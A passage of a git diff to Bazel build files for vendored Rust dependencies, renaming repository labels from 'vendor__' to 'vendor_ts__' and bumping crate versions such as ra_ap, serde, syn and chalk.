"ra_ap_intern-0.0.266", + actual = "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", tags = ["manual"], ) alias( name = "ra_ap_intern", - actual = "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", + actual = "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", tags = ["manual"], ) alias( - name = "ra_ap_load-cargo-0.0.258", - actual = "@vendor__ra_ap_load-cargo-0.0.258//:ra_ap_load_cargo", + name = "ra_ap_load-cargo-0.0.266", + actual = "@vendor_ts__ra_ap_load-cargo-0.0.266//:ra_ap_load_cargo", tags = ["manual"], ) alias( name = "ra_ap_load-cargo", - actual = "@vendor__ra_ap_load-cargo-0.0.258//:ra_ap_load_cargo", + actual = "@vendor_ts__ra_ap_load-cargo-0.0.266//:ra_ap_load_cargo", tags = ["manual"], ) alias( - name = "ra_ap_parser-0.0.258", - actual = "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", + name = "ra_ap_parser-0.0.266", + actual = "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", tags = ["manual"], ) alias( name = "ra_ap_parser", - actual = "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", + actual = "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", tags = ["manual"], ) alias( - name = "ra_ap_paths-0.0.258", - actual = "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", + name = "ra_ap_paths-0.0.266", + actual = "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", tags = ["manual"], ) alias( name = "ra_ap_paths", - actual = "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", + actual = "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", tags = ["manual"], ) alias( - name = "ra_ap_project_model-0.0.258", - actual = "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model", + name = "ra_ap_project_model-0.0.266", + actual = "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model", tags = ["manual"], ) alias( name = "ra_ap_project_model", - actual = "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model", + actual = "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model", tags = ["manual"], ) alias( - name = "ra_ap_span-0.0.258", - actual = 
"@vendor__ra_ap_span-0.0.258//:ra_ap_span", + name = "ra_ap_span-0.0.266", + actual = "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", tags = ["manual"], ) alias( name = "ra_ap_span", - actual = "@vendor__ra_ap_span-0.0.258//:ra_ap_span", + actual = "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", tags = ["manual"], ) alias( - name = "ra_ap_stdx-0.0.258", - actual = "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", + name = "ra_ap_stdx-0.0.266", + actual = "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", tags = ["manual"], ) alias( - name = "stdx-0.0.258", - actual = "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", + name = "stdx-0.0.266", + actual = "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", tags = ["manual"], ) alias( name = "stdx", - actual = "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", + actual = "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", tags = ["manual"], ) alias( - name = "ra_ap_syntax-0.0.258", - actual = "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", + name = "ra_ap_syntax-0.0.266", + actual = "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", tags = ["manual"], ) alias( name = "ra_ap_syntax", - actual = "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", + actual = "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", tags = ["manual"], ) alias( - name = "ra_ap_vfs-0.0.258", - actual = "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", + name = "ra_ap_vfs-0.0.266", + actual = "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", tags = ["manual"], ) alias( name = "ra_ap_vfs", - actual = "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", + actual = "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", tags = ["manual"], ) alias( - name = "rand-0.8.5", - actual = "@vendor__rand-0.8.5//:rand", + name = "rand-0.9.0", + actual = "@vendor_ts__rand-0.9.0//:rand", tags = ["manual"], ) alias( name = "rand", - actual = "@vendor__rand-0.8.5//:rand", + actual = "@vendor_ts__rand-0.9.0//:rand", tags = ["manual"], ) alias( name = "rayon-1.10.0", - actual = "@vendor__rayon-1.10.0//:rayon", + actual = 
"@vendor_ts__rayon-1.10.0//:rayon", tags = ["manual"], ) alias( name = "rayon", - actual = "@vendor__rayon-1.10.0//:rayon", + actual = "@vendor_ts__rayon-1.10.0//:rayon", tags = ["manual"], ) alias( name = "regex-1.11.1", - actual = "@vendor__regex-1.11.1//:regex", + actual = "@vendor_ts__regex-1.11.1//:regex", tags = ["manual"], ) alias( name = "regex", - actual = "@vendor__regex-1.11.1//:regex", + actual = "@vendor_ts__regex-1.11.1//:regex", tags = ["manual"], ) alias( - name = "serde-1.0.217", - actual = "@vendor__serde-1.0.217//:serde", + name = "serde-1.0.218", + actual = "@vendor_ts__serde-1.0.218//:serde", tags = ["manual"], ) alias( name = "serde", - actual = "@vendor__serde-1.0.217//:serde", + actual = "@vendor_ts__serde-1.0.218//:serde", tags = ["manual"], ) alias( - name = "serde_json-1.0.135", - actual = "@vendor__serde_json-1.0.135//:serde_json", + name = "serde_json-1.0.139", + actual = "@vendor_ts__serde_json-1.0.139//:serde_json", tags = ["manual"], ) alias( name = "serde_json", - actual = "@vendor__serde_json-1.0.135//:serde_json", + actual = "@vendor_ts__serde_json-1.0.139//:serde_json", tags = ["manual"], ) alias( name = "serde_with-3.12.0", - actual = "@vendor__serde_with-3.12.0//:serde_with", + actual = "@vendor_ts__serde_with-3.12.0//:serde_with", tags = ["manual"], ) alias( name = "serde_with", - actual = "@vendor__serde_with-3.12.0//:serde_with", + actual = "@vendor_ts__serde_with-3.12.0//:serde_with", tags = ["manual"], ) alias( - name = "syn-2.0.96", - actual = "@vendor__syn-2.0.96//:syn", + name = "syn-2.0.98", + actual = "@vendor_ts__syn-2.0.98//:syn", tags = ["manual"], ) alias( name = "syn", - actual = "@vendor__syn-2.0.96//:syn", + actual = "@vendor_ts__syn-2.0.98//:syn", tags = ["manual"], ) alias( - name = "toml-0.8.19", - actual = "@vendor__toml-0.8.19//:toml", + name = "toml-0.8.20", + actual = "@vendor_ts__toml-0.8.20//:toml", tags = ["manual"], ) alias( name = "toml", - actual = "@vendor__toml-0.8.19//:toml", + actual = 
"@vendor_ts__toml-0.8.20//:toml", tags = ["manual"], ) alias( name = "tracing-0.1.41", - actual = "@vendor__tracing-0.1.41//:tracing", + actual = "@vendor_ts__tracing-0.1.41//:tracing", tags = ["manual"], ) alias( name = "tracing", - actual = "@vendor__tracing-0.1.41//:tracing", + actual = "@vendor_ts__tracing-0.1.41//:tracing", tags = ["manual"], ) alias( name = "tracing-flame-0.2.0", - actual = "@vendor__tracing-flame-0.2.0//:tracing_flame", + actual = "@vendor_ts__tracing-flame-0.2.0//:tracing_flame", tags = ["manual"], ) alias( name = "tracing-flame", - actual = "@vendor__tracing-flame-0.2.0//:tracing_flame", + actual = "@vendor_ts__tracing-flame-0.2.0//:tracing_flame", tags = ["manual"], ) alias( name = "tracing-subscriber-0.3.19", - actual = "@vendor__tracing-subscriber-0.3.19//:tracing_subscriber", + actual = "@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber", tags = ["manual"], ) alias( name = "tracing-subscriber", - actual = "@vendor__tracing-subscriber-0.3.19//:tracing_subscriber", + actual = "@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber", tags = ["manual"], ) alias( name = "tree-sitter-0.24.6", - actual = "@vendor__tree-sitter-0.24.6//:tree_sitter", + actual = "@vendor_ts__tree-sitter-0.24.6//:tree_sitter", tags = ["manual"], ) alias( name = "tree-sitter", - actual = "@vendor__tree-sitter-0.24.6//:tree_sitter", + actual = "@vendor_ts__tree-sitter-0.24.6//:tree_sitter", tags = ["manual"], ) alias( name = "tree-sitter-embedded-template-0.23.2", - actual = "@vendor__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", + actual = "@vendor_ts__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", tags = ["manual"], ) alias( name = "tree-sitter-embedded-template", - actual = "@vendor__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", + actual = "@vendor_ts__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template", tags = ["manual"], ) alias( name = 
"tree-sitter-json-0.24.8", - actual = "@vendor__tree-sitter-json-0.24.8//:tree_sitter_json", + actual = "@vendor_ts__tree-sitter-json-0.24.8//:tree_sitter_json", tags = ["manual"], ) alias( name = "tree-sitter-json", - actual = "@vendor__tree-sitter-json-0.24.8//:tree_sitter_json", + actual = "@vendor_ts__tree-sitter-json-0.24.8//:tree_sitter_json", tags = ["manual"], ) alias( name = "tree-sitter-ql-0.23.1", - actual = "@vendor__tree-sitter-ql-0.23.1//:tree_sitter_ql", + actual = "@vendor_ts__tree-sitter-ql-0.23.1//:tree_sitter_ql", tags = ["manual"], ) alias( name = "tree-sitter-ql", - actual = "@vendor__tree-sitter-ql-0.23.1//:tree_sitter_ql", + actual = "@vendor_ts__tree-sitter-ql-0.23.1//:tree_sitter_ql", tags = ["manual"], ) alias( name = "tree-sitter-ruby-0.23.1", - actual = "@vendor__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", + actual = "@vendor_ts__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", tags = ["manual"], ) alias( name = "tree-sitter-ruby", - actual = "@vendor__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", + actual = "@vendor_ts__tree-sitter-ruby-0.23.1//:tree_sitter_ruby", tags = ["manual"], ) alias( name = "triomphe-0.1.14", - actual = "@vendor__triomphe-0.1.14//:triomphe", + actual = "@vendor_ts__triomphe-0.1.14//:triomphe", tags = ["manual"], ) alias( name = "triomphe", - actual = "@vendor__triomphe-0.1.14//:triomphe", + actual = "@vendor_ts__triomphe-0.1.14//:triomphe", tags = ["manual"], ) alias( name = "ungrammar-1.16.1", - actual = "@vendor__ungrammar-1.16.1//:ungrammar", + actual = "@vendor_ts__ungrammar-1.16.1//:ungrammar", tags = ["manual"], ) alias( name = "ungrammar", - actual = "@vendor__ungrammar-1.16.1//:ungrammar", + actual = "@vendor_ts__ungrammar-1.16.1//:ungrammar", tags = ["manual"], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.7.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.8.0.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.7.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.8.0.bazel index 8cab6aa66048..eb58d610f971 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.7.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bitflags-2.8.0.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "2.7.0", + version = "2.8.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel index f355f40e61eb..09e2ca4092d4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.borsh-1.5.3.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "1.5.3", deps = [ - "@vendor__borsh-1.5.3//:build_script_build", + "@vendor_ts__borsh-1.5.3//:build_script_build", ], ) @@ -134,7 +134,7 @@ cargo_build_script( version = "1.5.3", visibility = ["//visibility:private"], deps = [ - "@vendor__cfg_aliases-0.2.1//:cfg_aliases", + "@vendor_ts__cfg_aliases-0.2.1//:cfg_aliases", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel index 40c109380a87..baeadd361ef5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bstr-1.11.3.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "1.11.3", deps = [ - "@vendor__memchr-2.7.4//:memchr", + "@vendor_ts__memchr-2.7.4//:memchr", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel index 1c5987a67610..55635691a8f4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.camino-1.1.9.bazel @@ -86,8 +86,8 @@ rust_library( }), version = "1.1.9", deps = [ - "@vendor__camino-1.1.9//:build_script_build", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__camino-1.1.9//:build_script_build", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel index ebaa6fbc108a..3882206b4690 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo-platform-0.1.9.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.9", deps = [ - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel index 3ce41e37c246..0cbaa4613c05 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cargo_metadata-0.18.1.bazel 
@@ -84,11 +84,11 @@ rust_library( }), version = "0.18.1", deps = [ - "@vendor__camino-1.1.9//:camino", - "@vendor__cargo-platform-0.1.9//:cargo_platform", - "@vendor__semver-1.0.24//:semver", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:serde_json", - "@vendor__thiserror-1.0.69//:thiserror", + "@vendor_ts__camino-1.1.9//:camino", + "@vendor_ts__cargo-platform-0.1.9//:cargo_platform", + "@vendor_ts__semver-1.0.24//:semver", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:serde_json", + "@vendor_ts__thiserror-1.0.69//:thiserror", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel index 650c2f35f4db..56be5f5153be 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.2.7", deps = [ - "@vendor__shlex-1.3.0//:shlex", + "@vendor_ts__shlex-1.3.0//:shlex", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.99.0.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.99.0.bazel index 3c918d1dc988..bb2cfb0ca84c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.99.0.bazel 
@@ -79,11 +79,11 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__synstructure-0.13.1//:synstructure", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__synstructure-0.13.1//:synstructure", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.99.0.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.99.0.bazel index 2bdd3b3a0353..45829e9abfe2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.99.0.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -82,8 +82,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", + "@vendor_ts__bitflags-2.8.0//:bitflags", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.99.0.bazel similarity index 92% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.99.0.bazel index eecbab031314..e15beb719fb1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.99.0.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -82,11 +82,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__chalk-ir-0.98.0//:chalk_ir", - "@vendor__chalk-solve-0.98.0//:chalk_solve", - "@vendor__rustc-hash-1.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__chalk-ir-0.99.0//:chalk_ir", + "@vendor_ts__chalk-solve-0.99.0//:chalk_solve", + "@vendor_ts__rustc-hash-1.1.0//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.99.0.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.99.0.bazel index bca1e7971ed9..f12dc8d4f113 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.99.0.bazel 
@@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -82,14 +82,14 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__chalk-ir-0.98.0//:chalk_ir", - "@vendor__ena-0.14.3//:ena", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__petgraph-0.6.5//:petgraph", - "@vendor__rustc-hash-1.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__chalk-ir-0.99.0//:chalk_ir", + "@vendor_ts__ena-0.14.3//:ena", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__petgraph-0.6.5//:petgraph", + "@vendor_ts__rustc-hash-1.1.0//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel index 24d353c1eb9b..0f8702ab3f05 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel 
@@ -97,97 +97,97 @@ rust_library( }), version = "0.4.39", deps = [ - "@vendor__num-traits-0.2.19//:num_traits", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__num-traits-0.2.19//:num_traits", + "@vendor_ts__serde-1.0.218//:serde", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-darwin + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-darwin ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios-sim + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios-sim ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # aarch64-linux-android - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-linux-android + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # aarch64-linux-android + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-linux-android ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # aarch64-pc-windows-msvc + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # aarch64-pc-windows-msvc ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-fuchsia + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-fuchsia ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - 
"@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu, aarch64-unknown-nixos-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu, aarch64-unknown-nixos-gnu ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-nto-qnx710 + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-nto-qnx710 ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # arm-unknown-linux-gnueabi + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # arm-unknown-linux-gnueabi ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # armv7-linux-androideabi - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # armv7-linux-androideabi + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # armv7-linux-androideabi + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # armv7-linux-androideabi ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # armv7-unknown-linux-gnueabi + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # armv7-unknown-linux-gnueabi ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-apple-darwin + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-apple-darwin ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # i686-linux-android - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-linux-android + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # i686-linux-android + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-linux-android ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # i686-pc-windows-msvc + 
"@vendor_ts__windows-targets-0.52.6//:windows_targets", # i686-pc-windows-msvc ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-freebsd + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-freebsd ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-linux-gnu ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # powerpc-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # powerpc-unknown-linux-gnu ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # s390x-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # s390x-unknown-linux-gnu ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__js-sys-0.3.76//:js_sys", # wasm32-unknown-unknown - "@vendor__wasm-bindgen-0.2.99//:wasm_bindgen", # wasm32-unknown-unknown + "@vendor_ts__js-sys-0.3.76//:js_sys", # wasm32-unknown-unknown + "@vendor_ts__wasm-bindgen-0.2.99//:wasm_bindgen", # wasm32-unknown-unknown ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-darwin + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-darwin ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-ios + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-ios ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # x86_64-linux-android - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-linux-android + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # x86_64-linux-android + 
